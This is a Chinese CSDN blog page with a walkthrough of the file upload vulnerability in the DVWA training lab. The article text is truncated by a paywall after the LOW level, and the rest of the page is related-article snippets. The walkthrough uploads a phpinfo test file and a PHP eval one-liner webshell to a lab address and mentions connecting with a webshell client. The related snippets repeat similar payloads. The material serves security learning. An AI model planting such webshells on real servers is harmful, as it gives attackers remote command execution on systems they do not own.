DVWA--文件上传漏洞

最新推荐文章于 2024-07-21 04:03:36 发布
最新推荐文章于 2024-07-21 04:03:36 发布
阅读量1.4k 收藏 3
点赞数 1
文章标签: DVWA 渗透测试 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43871760/article/details/103299960
版权
本文详细介绍了DVWA中的文件上传漏洞,从LOW到IMPOSSIBLE级别的安全设置,并展示了如何利用Burp Suite进行绕过。讨论了包括文件头校验、后缀名黑白名单、内容检查等防御手段,以及客户端和服务器端的绕过策略,如文件类型、文件头和后缀名绕过,配合文件包含漏洞和服务器解析漏洞等。
摘要由CSDN通过智能技术生成

文件上传漏洞定义
文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。
文件上传漏洞的前提

  1. 能上传的木马
  2. 上传的木马可执行
  3. 还要清楚上传后的路径

实现过程
LOW级别
源码
在这里插入图片描述
basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文件名中包含文件后缀名,反之不包含文件后缀名。
由源码可知暂时并没有进行任何过滤;
(1)创建1.php并上传
1.php:<?php phpinfo();?>
在这里插入图片描述
可发现上传成功,服务器未做任何限制,此时再次访问上传路径
http://192.168.254.128/dvwa/hackable/uploads/1.php#
在这里插入图片描述
上传并执行php文件,说明存在文件上传漏洞
(2)上传一句话木马
b.php:<?php @eval($_POST[cmd]);?>
在这里插入图片描述
http://192.168.254.128/dvwa/hackable/uploads/b.php#

页面没有报错说明上传成功
打开中国菜刀,并且写入路径<

最低0.47元/天 解锁文章
ST小姐姐
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA-File Upload/文件上传漏洞
jammny
11-22 1062
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
DVWA文件上传漏洞
极光时流
03-31 655
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1172
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
最新发布
weixin_60838266的博客
07-21 1402
DVWA靶场漏洞复现之文件上传+文件包含。
Dvwa文件上传漏洞
JBlock的博客
11-16 4045
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
dvwa中的文件上传漏洞
无痕的博客
01-12 8069
dvwa漏洞环境演示文件上传漏洞
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
DVWA-master.zip
07-31
**文件上传漏洞**:DVWA中的文件上传漏洞是模拟了现实中Web应用中可能存在的危险情况。攻击者可以通过上传恶意文件,如脚本或可执行文件,来获取服务器的控制权。了解这类漏洞可以帮助我们理解如何验证用户上传的...
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4304
DVWA文件上传
DVWA文件上传漏洞
sunshine1_0的博客
01-20 1745
文件上传漏洞 低级别 中等级别 高级别
DVWA 文件上传漏洞
QYbkx974的博客
11-16 843
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞
DVWA文件上传漏洞
Feng_Blue_的博客
10-19 727
low等级 通过分析源代码,第一条只是分析上传是否为空,第二句则是文件的上传路径,第三条则是名字,可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。 如果上传成功,则会提示 路径+succesfully uploaded! 如果上传失败,则会提示 Your image was not uploaded。 我们尝试上传一个一句话木马 使用菜刀链接 菜刀可以完全访问 Medi...
DVWA文件上传漏洞(upload)
kirito_pio的博客
06-04 1686
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值